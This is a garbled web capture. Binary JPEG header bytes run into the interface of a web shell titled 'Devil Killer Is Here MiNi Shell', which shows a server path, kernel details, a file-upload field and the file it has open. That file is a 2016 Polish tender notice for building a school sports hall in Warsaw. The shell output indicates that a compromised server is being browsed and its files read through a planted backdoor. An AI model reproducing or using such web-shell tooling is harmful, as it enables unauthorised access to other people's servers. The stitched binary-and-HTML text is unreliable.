JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160510/116386-N-2016.html

<p class="kh_header"><b>Warszawa: Budowa sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31
w Warszawie  (znak sprawy ZP- 40/16)</b><br>
<b>Numer ogłoszenia: 116386 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Śródmieście , ul. Nowogrodzka 43, 00-691 Warszawa, woj. mazowieckie, tel. 22 443 93 93, faks 22 443 94 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31
w Warszawie  (znak sprawy ZP- 40/16).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I)  Opis przedmiotu zamówienia:

Przedmiotem zamówienia jest budowa sali sportowej przy Zespole Szkół nr 23 przy 
ul. Górnośląskiej 31 w Warszawie, zgodnie z:
1.	Dokumentacją projektową zawierającą:
1)	Projekt architektoniczno budowlany pełnobranżowy budowy sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany dnia 28 sierpnia 2015 r. przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań. Projektanci - architektura mgr inż. arch. Tomasz Białoszewski, konstrukcja mgr inż. Wywigacz, instalacje sanitarne mgr inż. Goździewicz, instalacje elektryczne mgr inż. Wiesław Kapłon, instalacje teletechniczne mgr inż. Przemysław Iwański, sprawdzający: architektura mgr inż. arch. Grzegorz Pacer, konstrukcja mgr inż. Łukasz Burzyński, instalacje sanitarne mgr inż. Krzysztof Dostatni, instalacje elektryczne mgr inż. Ryszard Miradecki, instalacje teletechniczne mgr inż. Andrzej Dudziński.
2)	Projekt wykonawczy dla węzła cieplnego sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonany dnia 30 lipca 2015 r. przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań. Projektant mgr inż. Marcin Płoszaj, sprawdzający mgr inż. Krzysztof Dostatni.
3)	Przedmiar robót budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie - branża sanitarna, kalkulację aktualizował inż. Paweł Goniprowski dnia 4 kwietnia 2016 r. na podstawie przedmiaru wykonanego przez Marcina Płoszaja, GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań.
4)	Przedmiar robót budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie - branża elektryczna, kalkulację aktualizował Arkadiusz Kiereś dnia 27 listopada 2015 r. na podstawie przedmiaru wykonanego przez mgr inż. Wiesława Kapłon, GPVT Pracownia Architektoniczna ul. Pamiątkowa 2/37, Poznań. 
5)	Przedmiar robót  budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie - branża budowlana, kalkulację aktualizował Marek Świątecki dnia                         4 kwietnia 2016 r. na podstawie przedmiaru wykonanego przez Arkadiusza Nowaczyka, przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań.
2.	Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych w zakresie instalacji sanitarnych dla budowy sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonaną dnia 30 sierpnia 2015 r. przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań, sporządził Marcin Płoszaj.
3.	Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych w zakresie instalacji elektrycznych i teletechnicznych dla budowy sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31 w Warszawie, wykonaną dnia 14 sierpnia 2015 r. przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań. 
4.	Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych w zakresie roboty budowlane dla budowy sali sportowej przy Zespole Szkół nr 23 przy ul. Górnośląskiej 31 W Warszawie, wykonaną przez GPVT Pracownia Architektoniczna, ul. Pamiątkowa 2/37, Poznań. Aktualizował Marek Świątecki dnia 4 kwietnia 2016 r.

Ww. opracowanie stanowi załącznik nr 8 do SIWZ.

Zamawiający dopuszcza rozwiązania równoważne opisanym w dokumentacji projektowej oraz specyfikacjach technicznych wykonania i odbioru robót. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego produkty, urządzenia i technologie spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania innych urządzeń niż określone w SIWZ należy dołączyć do oferty karty katalogowe tych urządzeń.

Dane ogólne budynku:
Powierzchnia całkowita ok. 2 681,95 m2.
Kubatura ok. 13 199,17 m.

W zakres zamówienia wchodzi m.in.:
-	wykonanie robót rozbiórkowych istniejących elementów zagospodarowania,
-	wykonanie budynku sali sportowej wraz z szatniami i łącznikiem,
-	wykonanie instalacji sanitarnych, co, wentylacji i elektrycznych oraz teletechnicznych,
-	wyposażenie wybudowanego obiektu zgodnie z dokumentacją techniczną,
-	wykonanie zagospodarowania terenu.

UWAGA:
1.	W zakresie inteligentnego zarządzania budynkiem, Wykonawca zobowiązany jest wybrać producenta kompletnego systemu BMS i sporządzić szczegółową dokumentacją powykonawczą.
2.	Zamawiający dopuszcza zmiany w projekcie rozwiązań konstrukcyjnych mieszczących się, zgodnie z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2013r. poz. 1409 ze zm.), w katalogu zmian nie istotnych pod warunkiem sporządzenia i sprawdzenia projektu konstrukcyjnego zamiennego przez osoby uprawnione do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz pozytywnym uzgodnieniu tych zmian z Zamawiającym.
3.	W cenie oferty należy uwzględnić postanowienia wynikające z Decyzji nr 173/Z/16 - usunięcie drzew i dokonanie nasadzeń zastępczych.
4.	Przed rozpoczęciem robót należy przedłożyć inspektorowi nadzoru, pisemną opinię ornitologiczną dotyczącą ochrony ptaków w trakcie prowadzonych robót.


Wymagania związane z realizacją zamówienia dotyczące zatrudnienia osób na podstawie umowy o pracę   (klauzula społeczna - art. 29 ust. 4 pkt 4) ustawy Pzp).
1.	Zamawiający w przedmiotowym postępowaniu stosuje klauzulę społeczną na podstawie 
art. 29 ust. 4 pkt 4 ustawy z dnia 29 stycznia 2004 r, Prawo zamówień publicznych (t.j. Dz. U. z 2015r., poz. 2164).
2.	Zamawiający wymaga, aby Wykonawca przez cały okres wykonywania przedmiotu umowy zatrudniał na podstawie umowy o pracę w pełnym wymiarze czasu pracy w rozumieniu Kodeksu Pracy co najmniej 10 osób, przez Wykonawcę lub podwykonawcę, wykonujących czynności w trakcie realizacji zamówienia na roboty budowlane.
3.	Powyższy warunek zostanie spełniony poprzez zatrudnienie na umowę o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już u Wykonawcy:
a)	1 osobę w charakterze kierownika budowy, który posiada odpowiednie uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2013r. poz. 1409 ze zm.),
b)	9 osób w charakterze pracowników ogólnobudowlanych. 
Rodzaj czynności niezbędnych do realizacji zamówienia przez osoby zatrudnione na podstawie umowy o pracę został szczegółowo opisany w dokumentacji technicznej.
4.	Wykonawca w terminie 3 dni od dnia zawarcia umowy przedstawi Zamawiającemu do wglądu umowy o pracę osób zatrudnionych, o których mowa w pkt 2  i 3 oraz na każde żądanie Zamawiającego w terminie 2 dni roboczych od dnia otrzymania wezwania.
5.	Wykonawca zobowiązany jest do składania faktur VAT wraz z pisemnym oświadczeniem o wykonaniu obowiązku określonego w pkt 2 i 3.
6.	Zatrudnienie osób o których mowa w pkt 2 i 3 przy realizacji przedmiotu umowy będzie trwać od dnia zawarcia umowy do dnia zakończenia wykonywania przedmiotu umowy. W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, Wykonawca zobowiązuje się, w terminie 14 dni od dnia rozwiązania umowy z zatrudnioną osobą, do zatrudnienia na to miejsce innej osoby na warunkach określonych w pkt 2 i 3 posiadającej tożsamą wiedzę i doświadczenie do wykonywania lub nadzorowania robót budowlanych. Zmiany te nie stanowią zmiany niniejszej umowy.
7.	Wykonawca powinien uzyskać od zatrudnionych pracowników, o których mowa w pkt 2 i 3 zgodę na dostęp do danych osobowych przez Zamawiającego w celu prawidłowej realizacji umowy.
8.	W przypadku niezatrudnienia przy realizacji zamówienia wymaganej przez Zamawiającego liczby osób na umowę o pracę lub nieprzedstawienia Zamawiającemu na jego żądanie umów o prace dokumentujących świadczenie pracy, Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 0,005% wartości wynagrodzenia brutto określonego w § 3 ust. 1 umowy. Kara będzie naliczana za każdy rozpoczęty dzień, w którym Wykonawca nie wypełnił zobowiązania.
9.	Realizacja zamówienia przez wyżej wskazane osoby związana jest z faktem prowadzenia robót budowlanych na terenie obiektu oświatowego w trakcie prowadzenia zajęć szkolnych. W celu  zapewnienia właściwej, odpowiedniej dla terenu oświatowego organizacji robót oraz uzyskanie większego prawdopodobieństwa terminowego wykonania zamówienia. Osoby zatrudnione na podstawie stosunku pracy to większa dyspozycyjność osób wykonujących zamówienie wobec Zamawiającego i Wykonawcy, większe doświadczenie personelu (wynikające ze stałości zatrudnienia u danego wykonawcy), lepsza kontrola wykonania zamówienia z uwagi na podporządkowanie pracowników wynikające ze stosunku pracy, większe zaangażowanie pracowników (wynikające z potrzeby należytego wywiązania się z obowiązków pracowniczych, co przekłada się na utrzymanie zatrudnienia).


Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie umowy (załącznik nr 7 do SIWZ).



II)  Wymagania Zamawiającego dotyczące oferowanych robót budowlanych:

Zamawiający wyselekcjonował grupę czterech materiałów mających decydujący wpływ na jakość i estetykę wykończenia robót budowlanych i nazwał je materiałami kluczowymi są to: 
- Systemowy sufit podwieszony,
- Gres podłogi 40 x 40,
- Okładzina ścienna (łazienki) 30 x 60 
- Wykładzina sportowa.
Oferowane materiały kluczowe muszą spełniać wymagania Zamawiającego określone w 
załączniku nr 1 do Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych w zakresie robót budowlanych dla projektu budowlano-wykonawczego budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie, a w szczególności muszą potwierdzać spełnianie wymagań dotyczących  następujących  parametrów:
a)	systemowy sufit podwieszony - reakcja na ogień, grubość,  pochłanianie dźwięku, pogłosowy wsp. pochłaniania dźwięku (dla określonych częstotliwości w zał. nr 1 do ww  STWiORB),
b)	gres podłogi 40x40 -   siła łamiąca, odporność na ścieranie wgłębne, rozmiar płytek  podłogi, antypoślizgowość podłogi, kolor,
c)	okładzina ścienna (łazienki) 30x60  -  siła łamiąca,  rozmiar płytek, kolor, nasiąkliwość wodna, odporność na plamienie,
d)	wykładzina sportowa - grubość całkowita, ciężar na powierzchnię, szerokość pasma, próba rolek od krzesła.

Wymagany termin wykonania zamówienia:
od dnia zawarcia umowy do dnia 30 października 2018r.

Przedmiot zamówienia należy wykonać etapami:
I etap do kwoty brutto 5.041.294,00 w terminie do dnia 10 grudnia 2016 r.,
II etap do kwoty brutto 5.786.046,00 w terminie do dnia 10 grudnia 2017 r.,
III etap - zakończenie wykonania przedmiotu umowy nastąpi po uzyskaniu pozwolenia na użytkowanie obiektu, lecz nie później niż do dnia 30 października 2018r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2, 45.30.00.00-0, 45.40.00.00-1, 45.11.12.91-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 250 000,00 PLN (słownie: dwieście pięćdziesiąt tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe polegające na wykonaniu w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonego, 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia obejmującego wykonanie robót budowlanych w branży budowlanej, sanitarnej i elektrycznej z wyłączeniem robót w lokalach mieszkalnych. Wartość zamówienia - jednej umowy nie może być mniejsza niż 5.000.000,00 zł  (brutto).
W zakresie wykazania spełniania przez Wykonawcę tego warunku należy przedłożyć oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Ocena spełnienia warunku udziału w postępowaniu dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 5.000.000,00 zł. W zakresie wykazania spełniania przez Wykonawcę tego warunku należy przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału 
w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:
- informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że oferowane roboty budowlane odpowiadają wymaganiom Zamawiającego. 
W celu potwierdzenia, że oferowane materiały kluczowe odpowiadają wymaganiom określonym  w załączniku nr 1 do Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych w zakresie robót budowlanych dla projektu budowlano-wykonawczego budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie, Zamawiający żąda:
1) wskazania nazwy producenta wraz z oznaczeniem handlowym oferowanego materiału kluczowego.  Materiały kluczowe to: Systemowy sufit podwieszony ; Gres podłogi 40x40 ; Okładzina ścienna (łazienki) 30x60 ; Wykładzina sportowa.
    Wykaz materiałów kluczowych należy sporządzić wg wzoru stanowiącego załącznik 
    nr 6 do SIWZ - Tabela materiałów kluczowych.
2)	złożenia kart katalogowych lub specyfikacji technicznych oferowanych materiałów kluczowych. 
Karty katalogowe, specyfikacje techniczne muszą potwierdzać że oferowane materiały kluczowe spełniają wymagania Zamawiającego określone w załączniku nr 1 do Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych w zakresie robót budowlanych dla projektu budowlano-wykonawczego budowy sali sportowej przy ZS nr 23 przy ul. Górnośląskiej 31 w Warszawie, a  w szczególności muszą potwierdzać:
a)	dla systemowego sufitu podwieszonego - reakcje na ogień, grubość, pochłanianie dźwięku, pogłosowy wsp. pochłaniania dźwięku (dla określonych częstotliwości w zał. nr 1 do ww  STWiORB),
b)	dla gresu podłogi 40x40 -   siłę łamiącą, odporność na ścieranie wgłębne, rozmiar płytek  podłogi, antypoślizgowość podłogi, kolor,
c)	dla okładziny ściennej (łazienki) 30x60  -  siłę łamiącą, rozmiar płytek, kolor, nasiąkliwość wodna, odporność na plamienie,
d)	dla wykładziny sportowej - grubość całkowitą, ciężar na powierzchnię, szerokość pasma, próba rolek od krzesła.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Pełnomocnictwo, w przypadku gdy Wykonawcę reprezentuje pełnomocnik,

2)	Dokumenty dotyczące Wykonawców polegających na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych.   
     Jeżeli Wykonawca, wykazując spełnianie warunków w postępowaniu, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia oraz że stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.  
     Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
a)	w przypadku warunku, o którym mowa w art. 22 ust.1 pkt 4 ustawy  - wykonawca przedkłada:
